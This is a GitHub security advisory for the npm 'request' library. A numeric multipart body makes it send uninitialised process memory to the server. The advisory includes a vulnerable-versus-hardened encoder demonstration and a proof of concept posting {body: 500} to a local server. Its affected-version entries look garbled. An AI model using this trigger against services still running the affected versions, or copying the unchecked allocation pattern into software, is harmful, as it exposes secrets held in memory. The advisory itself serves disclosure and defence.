
GHSA-7xfp-9c55-5vqj

GitHub Security Advisory

Remote Memory Exposure in request

Severity: MODERATE (GitHub Reviewed, has CVE)

Advisory Details

Affected versions of `request` disclose memory of the calling process to remote systems in certain circumstances. When a multipart request is made and a part's `body` is of type `number`, that number is treated as a size rather than as content: a buffer of that many bytes is allocated and sent to the remote server as the part body. Because the buffer is not zeroed on allocation, it carries whatever the process previously held in that memory (key material, other requests' data, and so on), so any caller that lets user-controlled input reach a multipart `body` without type checking can be made to exfiltrate process memory to the target server.
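The mechanism in that paragraph, as an added example that is not `request`'s own code: a reduced multipart encoder in which the vulnerable part encoder hands `body` straight to a buffer allocation (the pattern the advisory describes; `Buffer.allocUnsafe` stands in for the pre-Node-8 `new Buffer(n)` behaviour, since current Node zero-fills `new Buffer(n)`), next to a hardened encoder that accepts only a string or `Buffer`. Function names, the boundary string and the sample parts are constructed for this demonstration.

```javascript
'use strict';

const CRLF = '\r\n';

// Vulnerable encoder: mirrors the affected behaviour. A numeric body becomes
// a size, and the uninitialised bytes are what gets sent over the wire.
// (Pre-Node-8 `new Buffer(n)` returned uninitialised memory; Buffer.allocUnsafe
// reproduces that on current Node.)
function encodePartVulnerable(body) {
  if (typeof body === 'number') return Buffer.allocUnsafe(body);
  return Buffer.from(body);
}

// Hardened encoder: a part body must be content, never a size. Anything that
// is not a string or a Buffer is rejected before any allocation happens.
function encodePartSafe(body) {
  if (typeof body === 'string') return Buffer.from(body, 'utf8');
  if (Buffer.isBuffer(body)) return body;
  throw new TypeError('multipart part body must be a string or Buffer, got ' + typeof body);
}

// Builds a multipart payload for an array of { headers?, body } parts using the
// supplied part encoder. Header names are a constructed subset; real clients
// emit more.
function buildMultipart(parts, boundary, encodePart) {
  const chunks = [];
  for (const part of parts) {
    let preamble = '--' + boundary + CRLF;
    for (const [name, value] of Object.entries(part.headers || {})) {
      preamble += name + ': ' + value + CRLF;
    }
    preamble += CRLF;
    chunks.push(Buffer.from(preamble, 'utf8'));
    chunks.push(encodePart(part.body));
    chunks.push(Buffer.from(CRLF, 'utf8'));
  }
  chunks.push(Buffer.from('--' + boundary + '--' + CRLF, 'utf8'));
  return Buffer.concat(chunks);
}

// Bytes contributed by the part bodies alone: with the vulnerable encoder a
// { body: 500 } part adds 500 bytes the caller never supplied.
function bodyBytes(parts, encodePart) {
  return parts.reduce((n, p) => n + encodePart(p.body).length, 0);
}

// Demo with the advisory's { body: 500 } part (constructed input).
const boundary = 'boundary-constructed-for-demo';
const pocParts = [{ body: 500 }];
console.log('vulnerable encoder would send', bodyBytes(pocParts, encodePartVulnerable),
  'bytes of process memory as the body');
try {
  buildMultipart(pocParts, boundary, encodePartSafe);
} catch (e) {
  console.log('hardened encoder refuses:', e.message);
}
```

If upgrading is not immediately possible, the same type check can be applied in the caller before `request()` is invoked: reject any `multipart` entry whose `body` is not a string or `Buffer`, because the library itself will not.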

## Proof of Concept

```js
var request = require('request');
var http = require('http');

// Local server standing in for the "remote system": it logs whatever body
// bytes the client sends. With a vulnerable `request`, those 500 bytes are
// uninitialised process memory, not the digits "500".
var serveFunction = function (req, res) {
  req.on('data', function (data) {
    console.log(data);
  });
  res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);

// The part body is the number 500, which the affected versions treat as an
// allocation size rather than as content.
request({
  method: "POST",
  uri: 'http://localhost:8000',
  multipart: [{body: 500}]
}, function (err, res, body) {
  server.close();
});
```

## Recommendation

Update to version 2.68.0 or later. Until then, ensure every `multipart` part's `body` is a string or `Buffer` before passing it to `request`.

Affected Packages

- npm `request`: affected versions 2.49.0 (fixed in 2.68.0)
- npm `request`: affected versions 2.2.6 (fixed in 2.68.0)

Key Information

GHSA ID: GHSA-7xfp-9c55-5vqj
Published: November 9, 2018 5:44 PM
Last Modified: September 12, 2023 6:48 PM
CVSS Score: 5.0 / 10
Primary Ecosystem: npm
Primary Package: request
GitHub Reviewed: Yes

Dataset

Last updated: July 3, 2025 6:26 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.